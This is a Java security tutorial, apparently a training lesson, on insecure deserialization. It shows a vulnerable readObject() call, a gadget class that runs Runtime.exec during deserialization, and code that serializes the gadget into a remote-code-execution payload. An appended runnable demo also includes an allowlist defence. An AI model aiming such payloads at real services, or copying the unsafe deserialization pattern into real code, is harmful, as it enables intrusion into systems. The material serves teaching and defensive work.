== The Simplest Exploit

=== Vulnerable code

The following is a well-known example of a Java deserialization vulnerability.

[source,java]
----
InputStream is = request.getInputStream();
ObjectInputStream ois = new ObjectInputStream(is);
AcmeObject acme = (AcmeObject) ois.readObject();
----

The code expects an `AcmeObject`, but `readObject()` runs before the cast occurs: the stream itself decides which class gets instantiated, and that class's own `readObject()` method executes before the `ClassCastException` is ever thrown. If an attacker finds a class in the application's classpath whose `readObject()` implementation performs dangerous operations, they can serialize an instance of that class and force the vulnerable application to perform those actions.

=== Class included in ClassPath

Attackers need to find a class in the classpath that is serializable and has a dangerous implementation of `readObject()`.

[source,java]
----
public class GadgetObject implements Serializable {
    String cmd;

    private void readObject(ObjectInputStream stream)
            throws IOException, ClassNotFoundException {
        stream.defaultReadObject();      // restore the cmd field from the stream
        Runtime.getRuntime().exec(cmd);  // runs during deserialization, before any cast
    }
}
----

=== Exploit

If a Java class like the one above exists in the classpath, attackers can serialize an instance of it and obtain remote code execution by sending the resulting bytes wherever the application reads its `ObjectInputStream` (here, the request body).

[source,java]
----
GadgetObject go = new GadgetObject();
go.cmd = "touch /tmp/pwned.txt";

ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(go);
oos.flush();
byte[] exploit = bos.toByteArray();  // payload to send to the vulnerable endpoint
----
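The three steps above, run end to end in one file, as an added example that is not part of the original page: the gadget is serialized, fed to the vulnerable read (the command runs, then the cast fails), and then fed to a hardened read that rejects any class other than the expected one before its `readObject()` can execute. `AcmeObject` and `GadgetObject` are the names the page uses; `DeserDemo`, `SafeObjectInputStream`, `buildPayload`, `vulnerableRead` and `safeRead` are names chosen for this example. The allowlist in `resolveClass()` is a standard look-ahead deserialization defence, not something the page shows, and `Set.of` requires Java 9 or later.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.Serializable;
import java.util.Set;

public class DeserDemo {

    /** The type the application expects to receive. */
    static class AcmeObject implements Serializable {
        private static final long serialVersionUID = 1L;
        String name = "legit";
    }

    /** Gadget from the text: runs a command as a side effect of being deserialized. */
    static class GadgetObject implements Serializable {
        private static final long serialVersionUID = 1L;
        String cmd;

        private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
            in.defaultReadObject();          // restores 'cmd' from the stream
            Runtime.getRuntime().exec(cmd);  // executes before the caller's cast ever happens
        }
    }

    /** Attacker side: serialize a gadget instead of the expected AcmeObject. */
    static byte[] buildPayload(String cmd) throws IOException {
        GadgetObject go = new GadgetObject();
        go.cmd = cmd;
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(go);
        }
        return bos.toByteArray();
    }

    /** Vulnerable server code from the text: readObject() runs before the cast. */
    static AcmeObject vulnerableRead(InputStream is) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(is);
        // By the time the ClassCastException is thrown here, GadgetObject.readObject() has already run.
        return (AcmeObject) ois.readObject();
    }

    /**
     * Hardened variant: ObjectInputStream calls resolveClass() while reading the class
     * descriptor, before any instance is created, so an unexpected class is rejected
     * before its readObject() gets a chance to execute.
     */
    static class SafeObjectInputStream extends ObjectInputStream {
        private static final Set<String> ALLOWED = Set.of(AcmeObject.class.getName());

        SafeObjectInputStream(InputStream in) throws IOException {
            super(in);
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            if (!ALLOWED.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "class not on the deserialization allowlist");
            }
            return super.resolveClass(desc);
        }
    }

    static AcmeObject safeRead(InputStream is) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new SafeObjectInputStream(is)) {
            return (AcmeObject) ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Same harmless marker command the page uses; constructed payload, not captured traffic.
        byte[] exploit = buildPayload("touch /tmp/pwned.txt");

        try {
            vulnerableRead(new ByteArrayInputStream(exploit));
        } catch (ClassCastException e) {
            System.out.println("vulnerable: cast failed, but the command already ran: " + e.getMessage());
        }

        try {
            safeRead(new ByteArrayInputStream(exploit));
        } catch (InvalidClassException e) {
            System.out.println("hardened: rejected " + e.classname + " before readObject() ran");
        }
    }
}
```

Compile and run with `javac DeserDemo.java && java DeserDemo`; after the vulnerable call, `/tmp/pwned.txt` exists even though the application never obtained an `AcmeObject`. On Java 9 and later the same allowlist can also be expressed without subclassing, by calling `ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter("com.example.AcmeObject;!*"))` (JEP 290, package name hypothetical), which rejects every class not listed before it is instantiated.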